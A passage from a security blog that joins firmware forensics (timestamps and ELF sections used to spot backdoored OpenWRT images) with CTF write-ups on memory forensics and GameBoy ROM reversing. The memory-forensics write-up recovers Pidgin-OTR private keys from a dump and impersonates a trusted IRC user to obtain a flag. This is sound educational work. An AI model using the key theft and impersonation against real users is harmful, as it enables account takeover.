<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgnIx-kSSS3CpP4bvL1InNyXhyphenhypheniJWJhr1IptsDIaCeZKT5IjDrjlvTn2qBl8K1fY_0cbnnIcHmmilBNGdQfDnJ1j88KE7dZ7uzdkej11gDm8_PTDmpnQZIEV2eDtupQ4W4x4diZhJr_2m3/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgnIx-kSSS3CpP4bvL1InNyXhyphenhypheniJWJhr1IptsDIaCeZKT5IjDrjlvTn2qBl8K1fY_0cbnnIcHmmilBNGdQfDnJ1j88KE7dZ7uzdkej11gDm8_PTDmpnQZIEV2eDtupQ4W4x4diZhJr_2m3/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox.png" width="640" /></a></div>
<br />
The histogram view is very helpful to get a big picture of what's going on:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYndnlrFW3kKS_PuQou0DzvThOHZw4-jcfROKIpdIDzkw288b1eIWGP3T2AdUepG3718YEOrtDVqJjLBGBBgPhgsN6nl61Sb3LdV2iRNdK4-8ZKCVDJDzuZtSdgHuH9diwV6EgNwD8HkI/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYndnlrFW3kKS_PuQou0DzvThOHZw4-jcfROKIpdIDzkw288b1eIWGP3T2AdUepG3718YEOrtDVqJjLBGBBgPhgsN6nl61Sb3LdV2iRNdK4-8ZKCVDJDzuZtSdgHuH9diwV6EgNwD8HkI/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-2.png" width="640" /></a></div>
<br />
We can clearly see that the files included/modified on 2014-10-29 had a malicious nature. The <strike>state sponsored</strike> attacker did not modify other files from the OpenWRT base image.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLGB4tuUwhLuJaqSjyBmR5iE7rOgWtnlG8rlO5f4SMDofazD_xotrpCTYqvlrBn131CfW-fgVOaUFFGruXIBgRbYXXCBN10DNMFSOrTiDW3EIALnxEoSx8RiTMumh2qAAMrJXJfxk8ppB/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLGB4tuUwhLuJaqSjyBmR5iE7rOgWtnlG8rlO5f4SMDofazD_xotrpCTYqvlrBn131CfW-fgVOaUFFGruXIBgRbYXXCBN10DNMFSOrTiDW3EIALnxEoSx8RiTMumh2qAAMrJXJfxk8ppB/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-1.png" width="640" /></a></div>
<br />
At this point it is pretty clear that the firmware was modified using the <a href="https://downloads.openwrt.org/whiterussian/0.9/">OpenWRT Image Builder</a>, which is a pre-compiled OpenWrt build environment. The BinHeader and the Kernel timestamps were left untouched and the only partition modified was the SquashFS one.<br />
<br />
Of course these timestamps, like any kind of metadata, could be tampered by the malicious hacker. However, they are very helpful during the initial phases, speeding up investigations and narrowing the analysis to a smaller set of data.<br />
<br />
<b><br /></b>
<b>ELF Structural Information</b><br />
<br />
I always get impressed when AV vendors <a href="http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/">manage to profile APT and State-sponsored attackers</a> based on PE timestamps. Techniques like the <a href="https://www.mandiant.com/blog/tracking-malware-import-hashing/">imphash</a> are generally used exclusively on Windows.<br />
<br />
PE Imports are the functions that a piece of software calls from other files (typically DLLs). To track these imports, a hash is created based on library/API names and their specific order within the executable. Because of the way a PE’s import table is generated, we can use the imphash value to identify related malware samples, for example.<br />
<br />
Everybody does that for Windows binaries but what about Linux? Virustotal recently <a href="http://blog.virustotal.com/2014/11/virustotal-detailed-elf-information.html">included detailed ELF information on their engine</a>. We can also use these sections to identify useful information from the binaries, including the toolchain used to compile them.<br />
<br />
We generally don't have any timestamp information on the ELF section, but there are many other interesting fields. This <a href="http://reverse.lostrealm.com/protect/strip.html">quick guide on using strip</a> summarizes some topics:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><i>When an executable is produced from source code, there are two stages - compilation and linking. Compiling takes a source file and produces an object file. Linking concatenates these object files into a single executable. The concatenation occurs by section. For example, the .comment section for the final executable will contain the contents of the .comment section of each object file that was linked into the executable.</i></span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><i>If we examine the contents of the .comment section we can see the compiler used, plus the version of the compiler</i></span></blockquote>
It's pretty simple to read and parse the .comment sections from ELF files. <a href="https://www.gnu.org/software/binutils/">GNU readelf</a> (part of binutils) and <a href="https://github.com/eliben/pyelftools">pyelftools</a> include all the necessary functions parse them. <br />
<br />
I always try to display information from object files using different toolchains in order to find out which one understands the file structure properly. On this specific case, I'm going to use mipsel-linux-gnu-readelf (part of <a href="http://www.emdebian.org/">Emdebian</a> toolchain), but the regular readelf also does the job.<br />
<br />
<div class="code">
for i in $(find .) ; do echo $i ; mipsel-linux-gnu-readelf -p .comment $i ; done > comment-section.txt</div>
<div class="code">
./lib/modules/2.4.30/diag.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-adm.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-robo.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-core.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/wlcompat.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)</div>
<br />
Just a few ELF files included the comment section, others got stripped during the compilation/linking phase. If we download OpenWRT 0.9 <a href="https://downloads.openwrt.org/whiterussian/0.9/whiterussian-0.9.tar.bz2">sources</a> we can see that GCC 3.4.4 was indeed used:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguRNbkS5O0SkNKVmCnXtPObefTbL1QtA3WlFJQtC845WDh8GrViE4gBnC23hR1OxvT2kaFIcyr7cRzVYNV2URz_6FpMlKKHta9NXmMwBTQCSFZdAZmX2ZX1hAkzne5Tx5zSK1slPzb5uoi/s1600/gcc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguRNbkS5O0SkNKVmCnXtPObefTbL1QtA3WlFJQtC845WDh8GrViE4gBnC23hR1OxvT2kaFIcyr7cRzVYNV2URz_6FpMlKKHta9NXmMwBTQCSFZdAZmX2ZX1hAkzne5Tx5zSK1slPzb5uoi/s1600/gcc.png" width="400" /></a></div>
<br />
<a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">TheMoon Worm</a> exploited a command injection to infect Linksys wireless routers with a self-replicating malware. If we analyze its .comment section, we can see that it was probably compiled and linked using GCC 4.2.4 and 3.3.2. If we search for a .comment section on the router E4200, targeted by the worm, we can't find any reference because the toolchain stripped all of them. Having a file compiled with a different toolchain or containing extra ELF sections (that others files don't) is something highly suspicious.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeNDcpsDMMVWGbUN6Fezqrh15Oc8bKkOoNvnOtASfU3syJSV8RMBsaaXYBc3xgSaSZo-YGGrvwiuovtjLq6YtfdjunkdG1f6aJHGIs_Cc7b9SIoY3zBuKrSIldCLmvJqfvdVocThSGs0TD/s1600/moon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeNDcpsDMMVWGbUN6Fezqrh15Oc8bKkOoNvnOtASfU3syJSV8RMBsaaXYBc3xgSaSZo-YGGrvwiuovtjLq6YtfdjunkdG1f6aJHGIs_Cc7b9SIoY3zBuKrSIldCLmvJqfvdVocThSGs0TD/s1600/moon.png" width="400" /></a></div>
<br />
The .comment section for the final executable includes the contents of the .comment section of each object file that was linked into the executable. If we compare the comment section on <a href="http://www.asus.com/us/Networking/RTAC87U/HelpDesk_Download/">ASUS RT-AC87U</a> Firmwares v3.0.0.4.378.3885 and v3.0.0.4.376.2769, we can spot an extra line on the newer version from tfat.ko:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWexdvaJTK-nI845eF3B_ZZ3BqrUOTpo-rOpFSr4VLZZhjO011d9DX_bWwv9SKFXr8wnKsOrcJaEXSRF6ESHLJHXQ5TzxJGsCzHlQPrB1Cy_415Tn99werLHY0wYBEtZtI1uP15bG33FMS/s1600/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWexdvaJTK-nI845eF3B_ZZ3BqrUOTpo-rOpFSr4VLZZhjO011d9DX_bWwv9SKFXr8wnKsOrcJaEXSRF6ESHLJHXQ5TzxJGsCzHlQPrB1Cy_415Tn99werLHY0wYBEtZtI1uP15bG33FMS/s1600/compare.png" width="640" /></a></div>
<br />
If you want to dump all sections from the ELF file you may use this command line (kind of hacky, but works):<br />
<br />
<div class="code">
for i in $(find .) ; do echo "$i" ; for j in $(readelf -S "$i" | grep \\[ | cut -d"]" -f2 | cut -d " " -f2 | grep -v "Name") ; do mipsel-linux-gnu-readelf -p "$j" "$i" ; done ; done > list.txt</div>
<br />
The output will be a bit too verbose, you may want to narrow the analysis to the following sections:<br />
<br />
<ul>
<li>.comment - contains version control information</li>
<li>.modinfo - displays information from a kernel module</li>
<li>.notes - comments put there by the compiler/linker toolchain</li>
<li>.debug - contains information for symbol debugging</li>
<li>.interp - contains the name of the dynamic loader</li>
</ul>
<br />
For more information regarding the ELF file structure, check the <a href="http://man7.org/linux/man-pages/man5/elf.5.html">ELF man</a> and the Chapter 5 from <a href="http://www.amazon.com/Malware-Forensics-Field-Guide-Systems/dp/1597494704/">Malware Forensics Field Guide for Linux Systems</a>.<br />
<br />
<br />
<b>Conclusion</b><br />
<br />
Without further clues or context these information may not be relevant, but in conjunction with other data they're helpful to get a big picture of what's going on:<br />
<br />
<ul>
<li>Diffing the content from previous firmwares may be useful to find out when backdoors were first installed, modified and/or removed.</li>
</ul>
<br />
<ul>
<li>Artifact timeline creation and analysis also helps to speed up investigations by correlating the vast amount of information found on system.</li>
</ul>
<br />
<ul>
<li>The contents from the ELF section will likely reveal the toolchain and the compiler version used to compile a suspect executable. Clues such as this are attribution identifiers, contributing towards identifying the platform used by the attacker to craft his code.</li>
</ul>
<br />
We can use the timestamps from the kernel partition to correlate different firmwares from the same family, for example. We can also compare the timestamps from each partition to find deviations: a firmware header created on 2007, with a Kernel timestamp from 2007 and a SquashFS partition dated to 2014 is highly suspicious.<br />
<br />
The <a href="http://firmware.re/">Firmware.RE</a> project is performing a large scale analysis, providing a better understanding of the security issues related to firmwares. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating different device families and showing how vulnerabilities reappear across different products. This is a really cool project to track how firmwares are evolving and getting security fixes.<br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twitter.com/vendorexcuses/status/550350987102552064"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYtcb2L9Vch9QwBhQhv_g9vlbaQFDAlwnmtZO7v5Jm4s8Hl8F12MJG3wy48JjZ7oK8STOlh1QQgcxe6Jrn9Tjwryj_fmUmigtc2BdTwDCDAVdKnPrWs7VHY_wicaXYR4oc8ydlbBpP6GtQ/s1600/tweet2.png" width="400" /></a><span id="goog_1123768601"></span><span id="goog_1123768602"></span><a href="https://www.blogger.com/"></a></div>
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-39378636243408732342014-11-30T21:02:00.001-02:002014-12-04T20:47:07.160-02:009447 2014 CTF Write Up: coor coor<div>
The Australian <a href="https://9447.plumbing/home">9447 Security Society CTF</a> took place on November 29-30 and it was yet another fun and really professionally organized CTF. I played with my friends from <a href="https://ctftime.org/team/10288">TheGoonies</a> once again (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>, right?).</div>
<br />
I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new book I recently bought: <a href="http://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098/">The Art of Memory Forensics</a> (authored by <a href="https://twitter.com/attrc">@attrc</a> and <a href="https://twitter.com/gleeda">@gleeda</a>).<br />
<br />
<b>Task: coor coor (misc - 400)</b><br />
<br />
<div class="code">
A 9447 CTF organizer is giving away flags to friends that he trusts. This memory dump was taken off a competitor's computer after a raid by the pwnpolice.
</div>
<br />
Download provided: <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2</a><br />
<br />
Let's start by identifying the Operating System profile:<br />
<div class="code">
python vol.py -f challenge.vmem imageinfo</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWbcfXviIh9S0etUEQJ37tfYxju_iIUvWJbnm1DypGH2jbudTyVknlqmLlliCQtP2R42xI6R7yH33c7wzv3lvgV8oIcZMDfg2jQRV1DavJkCD5KK9pP0sCDCvCbGw0eZjecixGSt5q_EZ/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWbcfXviIh9S0etUEQJ37tfYxju_iIUvWJbnm1DypGH2jbudTyVknlqmLlliCQtP2R42xI6R7yH33c7wzv3lvgV8oIcZMDfg2jQRV1DavJkCD5KK9pP0sCDCvCbGw0eZjecixGSt5q_EZ/s1600/Screenshot-Terminal.png" height="222" width="400" /></a></div>
<br />
Let's take screenshot to see what the user was doing:<br />
<div class="code">
python vol.py -f challenge.vmem screenshot -D screenshot/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPqJOWnY9tU1eMTWZU1_ns6P1L4knBCj0JAyoF5C_WvxZGHiuY_za_gGo7UtiAs8cshDub88eS9TWEIwavvLsXhfzRWxwdID66y9-TEnp618gdKq-UCWYJ_iqJ_C_wUbi_xeBNZsAC_79/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPqJOWnY9tU1eMTWZU1_ns6P1L4knBCj0JAyoF5C_WvxZGHiuY_za_gGo7UtiAs8cshDub88eS9TWEIwavvLsXhfzRWxwdID66y9-TEnp618gdKq-UCWYJ_iqJ_C_wUbi_xeBNZsAC_79/s1600/session_0.WinSta0.Default.png" height="182" width="320" /></a></div>
<br />
The user was running something inside VirtualBox, let's keep digging:<br />
<div class="code">
python vol.py -f challenge.vmem psxview</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeog3KLgUfspetmkTyP2Qar7gSoJ8toFh8Bk85k4Pa8uCo9mutipNdGNnsdsLQqycoRS8lF_Wms_JzxtGP6PqEn8dvzkmaC1yL-2moA-aFHVhzxCv8scpm688PIbxAGudlHICtAFQUSctm/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeog3KLgUfspetmkTyP2Qar7gSoJ8toFh8Bk85k4Pa8uCo9mutipNdGNnsdsLQqycoRS8lF_Wms_JzxtGP6PqEn8dvzkmaC1yL-2moA-aFHVhzxCv8scpm688PIbxAGudlHICtAFQUSctm/s1600/Screenshot-Terminal-1.png" height="320" width="280" /></a></div>
<div class="code">
python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFekiF7LITz92Jth_9kQ15MSz_Tk4nH5zwmBG7N4lSsrr7B3DHGwx7N10fqFqvgFlg8Y5IxOAp_c3j8LSHhi3lzYsfXMYGIcCq3fUbARKk0fm5ZKFpfy4VaG3CpW_oFy-TlkVb3MJMBpV1/s1600/xaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFekiF7LITz92Jth_9kQ15MSz_Tk4nH5zwmBG7N4lSsrr7B3DHGwx7N10fqFqvgFlg8Y5IxOAp_c3j8LSHhi3lzYsfXMYGIcCq3fUbARKk0fm5ZKFpfy4VaG3CpW_oFy-TlkVb3MJMBpV1/s1600/xaaa.png" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The user was basically running a VirtualBox machine (business2.vdi) from an Encrypted TrueCrypt container (secret.tc). That's why we used psxview to list the system processes before. Note that the lower offsets are used by the Host and the higher ones (after 0x7b760da0) are used by the guest OS. So what was he doing?<br />
<br />
<div class="code">
python vol.py -f challenge.vmem connscan</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_OGgOAkFiwLbDsROCjRK53Ww3N7_lZEzB05Ppy57YgD4OV5-l49brca289awJqFuOVeNOLXiFddg6OgiKRoP3O4aazLofAzUl4ejCQub-RgC7iceK0vNL_yXLL-rWfD5fIhGRQ23rUXpd/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_OGgOAkFiwLbDsROCjRK53Ww3N7_lZEzB05Ppy57YgD4OV5-l49brca289awJqFuOVeNOLXiFddg6OgiKRoP3O4aazLofAzUl4ejCQub-RgC7iceK0vNL_yXLL-rWfD5fIhGRQ23rUXpd/s1600/Screenshot-Terminal-4.png" height="81" width="400" /></a></div>
<br />
The host 54.149.24.114 (yodawg.9447.plumbing) happened to be an IRC server with only one active channel: #9447ctf. We can carve some pidgin logs using foremost:<br />
<br />
<div class="code">
python vol.py -f challenge.vmem mftparser | grep 9447ctf</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5mPQAFH1Fnog263RDbIaGIIYitTkXbadZH1lO3cA9th37SHQ795IjvKOjRjg1Ivd6994UAodg_ukt7gym6WNBvVvzhD9xX0ApWp8s_h-0bi2gVqketFhk3TCMLHnLumPsDlrjyPp29wf/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5mPQAFH1Fnog263RDbIaGIIYitTkXbadZH1lO3cA9th37SHQ795IjvKOjRjg1Ivd6994UAodg_ukt7gym6WNBvVvzhD9xX0ApWp8s_h-0bi2gVqketFhk3TCMLHnLumPsDlrjyPp29wf/s1600/Screenshot-Terminal-5.png" height="165" width="400" /></a></div>
<div class="code">
foremost challenge.vmem</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBViz7IeZS9Vq6LrImNQIFkWfjoPBsujBdW4SY-rKy28h7bs9dKZr-NY2RB4P7iotatPdfPGqIQlhS0cWcaISK44UCN6jwRM09PlCyyvzYHeoc18j_EspPEY2XliaKC76YW3xumwSxaug/s1600/carve.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBViz7IeZS9Vq6LrImNQIFkWfjoPBsujBdW4SY-rKy28h7bs9dKZr-NY2RB4P7iotatPdfPGqIQlhS0cWcaISK44UCN6jwRM09PlCyyvzYHeoc18j_EspPEY2XliaKC76YW3xumwSxaug/s1600/carve.png" height="160" width="400" /></a></div>
<br />
Private conversations are not logged by default on Pidgin with the OTR extension. We can see a couple of OTR encrypted messages on the memory dump:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx57I1HsVGraU4k30weWgQ_8Y8EuKffKTsRw31jT5YLqiaWC01025ZIzs1sf-xRfQzlskE-MQ18rVzS-99vsMqGVhDopDdHC-hH7EwCGgUn2C7PXckq_aiD302UN4uWuj-6EvnzJmXwl8v/s1600/hex2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx57I1HsVGraU4k30weWgQ_8Y8EuKffKTsRw31jT5YLqiaWC01025ZIzs1sf-xRfQzlskE-MQ18rVzS-99vsMqGVhDopDdHC-hH7EwCGgUn2C7PXckq_aiD302UN4uWuj-6EvnzJmXwl8v/s1600/hex2.PNG" height="48" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOjRIIN7RCnZs0KAl5u_71JbBQ_m17ccFH7eHaIatXOrYEhSPcNYiBEkPE9qefVB8KNK0K7I6ukvFPUu5k1t_nvM58GqvFogN6ZVCG6pF3ubl2e66nqZixEKydn67DZ6QreeTMlH9AJW-N/s1600/hex1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOjRIIN7RCnZs0KAl5u_71JbBQ_m17ccFH7eHaIatXOrYEhSPcNYiBEkPE9qefVB8KNK0K7I6ukvFPUu5k1t_nvM58GqvFogN6ZVCG6pF3ubl2e66nqZixEKydn67DZ6QreeTMlH9AJW-N/s1600/hex1.PNG" height="121" width="400" /></a></div>
<br />
Because of <a href="https://en.wikipedia.org/wiki/Forward_secrecy">Perfect Forward Secrecy</a>, if you lose control of your private keys, no previous conversation is compromised. I just had the long term signature keys (<a href="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738">otr.private_key</a>) and these aren't actually used to encrypt conversations, just to sign the session encryption key. I still needed to retrieve the short term encryption keys from the memory. I got stuck on this phase and spent the whole night trying to figure how to do that.<br />
<br />
After some time I decided to get some sleep and keep trying it on the following day. The first thing I did the next day was to re-read the challenge description and I quickly figured it out:<br />
<blockquote class="tr_bq">
<i>"A 9447 CTF organizer is giving away flags to <u>friends that he trusts."</u></i></blockquote>
Because of the way IRC works, I could easily impersonate testicool69 (the trusted frind), connect to the IRC server (yodawg.9447.plumbing:6667) and message acidburn88 (the CTF Admin) asking for the key. So how do I do that?<br />
<br />
Pidgin-OTR creates three files during an encrypted communication: otr.private_key, otr.instance_tags and otr.fingerprints. I searched for the term "prpl-irc" on the memory dump, extracted and replaced those files on my own Pidgin installation (%APPDATA%\.purple). There's a <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/pidgin_cred.rb">Metasploit post-module</a> to retrieve these keys from a live (hacked) system, by the way...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE2ZSVaiaTYPhyZ-JUN07SUafe1nZaV4d03qNNSjRv0pM3nE56e_hch8gK7azpwjfMTlnYNPmWMaVJg_LszMlvcXz3eOvWpZWU64EG1l4LEV-_j1TofTcOIeWmYbcDbf7pDKiBT-NonOMw/s1600/cript0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE2ZSVaiaTYPhyZ-JUN07SUafe1nZaV4d03qNNSjRv0pM3nE56e_hch8gK7azpwjfMTlnYNPmWMaVJg_LszMlvcXz3eOvWpZWU64EG1l4LEV-_j1TofTcOIeWmYbcDbf7pDKiBT-NonOMw/s1600/cript0.PNG" height="138" width="400" /></a></div>
<br />
<script src="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738.js"></script><br />
I managed to forge his fingerprint using the stolen private key and got the secret Flag:<br />
<br />
<div style="text-align: center;">
<b>9447{forensics_champ!}</b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXsvNggFtL3vEDJAsVF_-bwba14KDgMuOFlQEAgNBEDgXv4kA6-ryPgkxDNkJuXIQYhwuYaPPB5d7j3-y0FGhlelF8AVPd31YsYij-Pc5R3FslIbD0lzC8ANiutlKk1mvOi6ZMxJrC_FZW/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXsvNggFtL3vEDJAsVF_-bwba14KDgMuOFlQEAgNBEDgXv4kA6-ryPgkxDNkJuXIQYhwuYaPPB5d7j3-y0FGhlelF8AVPd31YsYij-Pc5R3FslIbD0lzC8ANiutlKk1mvOi6ZMxJrC_FZW/s1600/1.PNG" height="265" width="400" /></a></div>
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-77465316711940236122014-10-24T03:34:00.001-02:002014-10-24T03:50:16.559-02:00Hack.lu 2014 CTF Write Up: At Gunpoint<a href="http://2014.hack.lu/index.php/CaptureTheFlag">Hack.lu's 2014 CTF</a> took place on October 21-23. The event was organized by <a href="https://twitter.com/fluxfingers">fluxfingers</a>, and this year's challenges were really enjoyable, huge props to them. I played with my friends from TheGoonies - after winning the Brazilian CTF <a href="http://ctf.tecland.com.br/Pwn2Win/game/scoreboard/">Pwn2Win</a> we are now getting better organized to become more competitive. There are quite a few write ups around and I decided to post about a few tasks which we had a different solution from other teams.<br />
<br />
<b>Task: At Gunpoint (Reversing - 200)</b><br />
<br />
<div class="code">
You're the sheriff of a small town, investigating news about a gangster squad passing by. Rumor has it they're easy to outsmart, so you have just followed one to their encampment by the river. You know you can easily take them out one by one, if you would just know their secret handshake.
</div>
<br />
Download provided: <a href="https://wildwildweb.fluxfingers.net/static/chals/gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat">gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat</a><br />
<br />
File utility showed us that it was a GameBoy ROM. Having former Console Hackers on the team came handy during this challenge as we already knew in advance which tools to use and what to look for.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVR_jFQjRlLYTzuvCqQKhsnSeoDIRvRBsFEFcMXgOGC_jmd2KxKwN_PynKmFN4Ro4Fh1dEiSjUm9ry5UQh-ZT5oZH-yTOGV4fElxckYCjKfmwEKYeg6a7hr4tTDb7TO63vfUGi74JhMj5W/s1600/file1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVR_jFQjRlLYTzuvCqQKhsnSeoDIRvRBsFEFcMXgOGC_jmd2KxKwN_PynKmFN4Ro4Fh1dEiSjUm9ry5UQh-ZT5oZH-yTOGV4fElxckYCjKfmwEKYeg6a7hr4tTDb7TO63vfUGi74JhMj5W/s1600/file1.png" height="55" width="400" /></a></div>
<br />
We used <strike>TLayer</strike> <a href="http://www.romhacking.net/utilities/109/">TileMolester</a> from the legendary <a href="http://wiki.nesdev.com/w/index.php/Projects#stuff_by_SnowBro">SnowBro</a> to gather information about the graphics and the font data. Firstly, we switched the Codec to 1bpp and found the font used by the game.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjHQq3jhVELZHS11hDZtbWYAKz8iLCePxwuLG16nvn1BKYFBB5FseRmp1SkO4HVIYhc8Y1zhzGz3B-AfO6WIVvuK5WiMMve3RkxnR9m62SFH_33xeO_bTx9z4STRFBbLlb7bFiB6iz8Lop/s1600/tlayer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjHQq3jhVELZHS11hDZtbWYAKz8iLCePxwuLG16nvn1BKYFBB5FseRmp1SkO4HVIYhc8Y1zhzGz3B-AfO6WIVvuK5WiMMve3RkxnR9m62SFH_33xeO_bTx9z4STRFBbLlb7bFiB6iz8Lop/s1600/tlayer.png" height="297" width="320" /></a></div>
<br />
